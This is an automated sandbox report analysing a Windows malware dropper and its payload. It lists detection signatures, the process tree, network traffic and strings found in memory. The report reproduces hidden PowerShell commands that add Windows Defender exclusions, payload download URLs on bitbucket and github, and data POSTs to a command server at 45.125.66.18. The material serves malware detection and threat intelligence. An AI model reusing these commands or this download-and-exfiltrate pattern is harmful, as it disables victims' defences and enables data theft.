Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UBONg7lmVR.exe

Overview

General Information

Sample name:UBONg7lmVR.exe
renamed because original name is a hash value
Original sample name:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e.exe
Analysis ID:1499702
MD5:d2db9a159617250a517f9d074ab8f947
SHA1:cdc8efcd77ce4725200f29b9be43dac308a139a1
SHA256:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e
Tags:45-125-66-18exe
Infos:

Detection

Score:75
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • UBONg7lmVR.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\UBONg7lmVR.exe" MD5: D2DB9A159617250A517F9D074AB8F947)
    • y5cm2yzz.hwt.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe" MD5: A499C507987982C951093E21DF0C0D96)
      • powershell.exe (PID: 8124 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5596 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7948 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7848 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1060 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3396 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2300 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rapnewsa.exe (PID: 8032 cmdline: C:\Reka\rapnewsa.exe MD5: 2D4E723C184D9403B078E53F2DE74A23)
        • WerFault.exe (PID: 3904 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 122888 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe, ParentProcessId: 7992, ParentProcessName: y5cm2yzz.hwt.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 8124, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe, ParentProcessId: 7992, ParentProcessName: y5cm2yzz.hwt.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 8124, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe, ParentProcessId: 7992, ParentProcessName: y5cm2yzz.hwt.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 8124, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Reka\rapnewsa.exeAvira: detection malicious, Label: HEUR/AGEN.1315917
Source: C:\Reka\rapnewsa.exeReversingLabs: Detection: 15%
Source: C:\Reka\rapnewsa.exeVirustotal: Detection: 24%Perma Link
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeVirustotal: Detection: 8%Perma Link
Source: UBONg7lmVR.exeVirustotal: Detection: 13%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Reka\rapnewsa.exeJoe Sandbox ML: detected
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C1000 CryptUnprotectData,23_2_002C1000
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C1C40 CryptSignHashA,CryptUpdateProtectedState,WinHttpTimeFromSystemTime,23_2_002C1C40
Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.216.51.233:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: UBONg7lmVR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C8D40 FindFirstFileW,FindNextFileW,FindClose,23_2_002C8D40
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: global trafficHTTP traffic detected: GET /updated24/updated24/downloads/Updated11.12.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNM7G6QD3X&Signature=axhudmqEvDM%2FSUhiHDRgUnl7%2FLM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBPQNDA%2Bh4G46KXw4LFfA9Io2JrUo7qexVGkmClXZ9XZAiEArKzvP5lXvxR0bzw4zii8AXSrZI4T8YzSZDU5HRHXvGAqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDBQ5D%2BO3Og5loUNzrCqEAlNSqyxdg90lqENE7Z1SnCpP6CAEKvQ2ZHflx5%2B9h97EGF%2BXeWo6gNL%2FKeau4g9mlbbEotcMw%2BrrPvVtwNlOZZrAvPyqKCz9MZpRG%2BpiC03DY8EyD%2BgUcSrXtsYVj1pY8epvtBzRmE%2FiDtiuZev9AlPjjVReOc21XzmG2S5RzBnktovq9Demuoz4DZKVKfYpiyX89uYSRKAsxMv%2FByN7IdIq6qCZVRx0QazWdIaUsZX5xlSjdEpSJPis3lWADR%2FBDkpX3wpSdaWD8PCizYGKT%2F2E2%2FTQ6T9aJkUzXz9IvClo4ct3sHAuc3qQYEfeMTJWLjMFtZKl8vhj%2BumqVAPYpTlp6oAVMNfjtrYGOp0BKT9YWtFy1GR5MK5hXid7YqSJRvsd%2FwKLvb%2BM6KMzyorpcCHfTbjl0lcEiPM9exK3azj%2BG9Z6KbEtKqhP2JBh1l8nNQ0B8rOE9SFVdCbfZZDWbRo0WGaMriccmr%2FYO0vC%2BM%2FhPCYL5SvzOfGdaWbmKgehwLg0mMfHk38JTQGQTLnnz22wGGUIntx8r0LvBLZsgM369fVm52jEYq%2F5wg%3D%3D&Expires=1724758239 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: POST /api/receiver/recv HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48Content-Length: 3160Host: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /updated24/updated24/downloads/Updated11.12.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNM7G6QD3X&Signature=axhudmqEvDM%2FSUhiHDRgUnl7%2FLM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBPQNDA%2Bh4G46KXw4LFfA9Io2JrUo7qexVGkmClXZ9XZAiEArKzvP5lXvxR0bzw4zii8AXSrZI4T8YzSZDU5HRHXvGAqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDBQ5D%2BO3Og5loUNzrCqEAlNSqyxdg90lqENE7Z1SnCpP6CAEKvQ2ZHflx5%2B9h97EGF%2BXeWo6gNL%2FKeau4g9mlbbEotcMw%2BrrPvVtwNlOZZrAvPyqKCz9MZpRG%2BpiC03DY8EyD%2BgUcSrXtsYVj1pY8epvtBzRmE%2FiDtiuZev9AlPjjVReOc21XzmG2S5RzBnktovq9Demuoz4DZKVKfYpiyX89uYSRKAsxMv%2FByN7IdIq6qCZVRx0QazWdIaUsZX5xlSjdEpSJPis3lWADR%2FBDkpX3wpSdaWD8PCizYGKT%2F2E2%2FTQ6T9aJkUzXz9IvClo4ct3sHAuc3qQYEfeMTJWLjMFtZKl8vhj%2BumqVAPYpTlp6oAVMNfjtrYGOp0BKT9YWtFy1GR5MK5hXid7YqSJRvsd%2FwKLvb%2BM6KMzyorpcCHfTbjl0lcEiPM9exK3azj%2BG9Z6KbEtKqhP2JBh1l8nNQ0B8rOE9SFVdCbfZZDWbRo0WGaMriccmr%2FYO0vC%2BM%2FhPCYL5SvzOfGdaWbmKgehwLg0mMfHk38JTQGQTLnnz22wGGUIntx8r0LvBLZsgM369fVm52jEYq%2F5wg%3D%3D&Expires=1724758239 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/nepipirusas.json HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/iconozave.exe HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exeAccept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /get HTTP/1.1Host: httpbin.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficDNS traffic detected: DNS query: bitbucket.org
Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: unknownHTTP traffic detected: POST /api/receiver/recv HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48Content-Length: 3160Host: 45.125.66.18
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.comd
Source: rapnewsa.exe, 00000017.00000002.2746189003.00000000013F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coU
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.comd
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: rapnewsa.exe, 00000017.00000002.2746189003.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/
Source: rapnewsa.exe, 00000017.00000002.2746189003.00000000013AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/api/receiver/recv
Source: rapnewsa.exe, 00000017.00000002.2746189003.00000000013AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/api/receiver/recv)
Source: rapnewsa.exe, 00000017.00000002.2746189003.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18:443/api/receiver/recv
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
Source: UBONg7lmVR.exeString found in binary or memory: https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exe
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: y5cm2yzz.hwt.exe, 00000002.00000002.2759424988.000000C0000A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com
Source: y5cm2yzz.hwt.exe, 00000002.00000002.2759424988.000000C000136000.00000004.00001000.00020000.00000000.sdmp, y5cm2yzz.hwt.exe, 00000002.00000002.2760615080.000000C00018C000.00000004.00001000.00020000.00000000.sdmp, y5cm2yzz.hwt.exe, 00000002.00000002.2760615080.000000C0001DE000.00000004.00001000.00020000.00000000.sdmp, y5cm2yzz.hwt.exe, 00000002.00000002.2759424988.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, y5cm2yzz.hwt.exe, 00000002.00000002.2760615080.000000C0001BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exe
Source: y5cm2yzz.hwt.exe, 00000002.00000002.2759424988.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exeC:
Source: y5cm2yzz.hwt.exe, 00000002.00000002.2760615080.000000C0001BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com66666666666666666666
Source: y5cm2yzz.hwt.exe, 00000002.00000002.2761009256.000000C000212000.00000004.00001000.00020000.00000000.sdmp, y5cm2yzz.hwt.exe, 00000002.00000002.2759424988.000000C000136000.00000004.00001000.00020000.00000000.sdmp, y5cm2yzz.hwt.exe, 00000002.00000002.2760615080.000000C0001DE000.00000004.00001000.00020000.00000000.sdmp, y5cm2yzz.hwt.exe, 00000002.00000002.2761009256.000000C00022E000.00000004.00001000.00020000.00000000.sdmp, y5cm2yzz.hwt.exe, 00000002.00000002.2760615080.000000C0001F0000.00000004.00001000.00020000.00000000.sdmp, y5cm2yzz.hwt.exe, 00000002.00000002.2761009256.000000C000260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
Source: y5cm2yzz.hwt.exe, 00000002.00000002.2759424988.000000C00014C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe
Source: y5cm2yzz.hwt.exe, 00000002.00000002.2759424988.000000C00014C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exePROCESSOR_IDENTIFIER=Intel64
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
